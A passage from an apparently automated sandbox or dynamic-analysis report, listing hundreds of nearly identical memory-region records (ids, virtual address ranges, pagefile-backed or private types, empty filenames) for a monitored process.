= 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10644 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10645 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10646 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10647 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10648 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10649 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10650 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10651 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10652 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10653 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10654 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10655 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10656 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10657 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10658 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10659 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10660 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10661 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10662 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10663 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10664 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10665 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10666 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10667 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10668 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10669 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10670 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10671 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10672 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10673 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10674 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10675 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10676 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10677 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10678 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10679 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10680 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10681 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10682 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10683 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10684 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10685 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10686 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10687 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10688 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10689 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10690 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10691 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10692 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10693 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10694 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10695 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10696 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10697 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10698 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10699 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10700 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10701 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10702 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10703 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10704 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10705 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10706 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10707 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10708 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10709 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10710 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10711 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10712 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10713 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10714 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10715 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10716 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10717 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10718 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10719 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10720 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10721 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10722 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10723 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10724 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10725 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10726 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10727 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10728 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10729 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10730 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10731 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10732 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10733 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10734 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10735 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10736 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10737 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10738 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10739 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10740 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10741 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10742 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10743 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10744 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10745 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10746 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10747 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10748 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10749 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10750 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10751 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10752 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10753 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10754 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10755 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10756 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10757 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10758 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10759 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10760 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10761 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10762 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10763 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10764 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10765 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10766 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10767 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10768 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10769 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10770 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10771 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10772 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10773 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10774 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10775 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10776 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10777 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10778 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10782 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10785 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10787 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10788 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10791 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10792 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10793 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10794 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10795 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10797 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10798 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10800 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10801 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10802 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10803 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10804 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10805 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10806 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10807 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10808 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10809 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10810 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10811 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10812 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10813 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10814 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10815 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10816 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10817 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10818 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10819 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10820 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10821 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10822 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10823 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10824 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10825 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10826 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10827 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10828 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10829 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10830 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 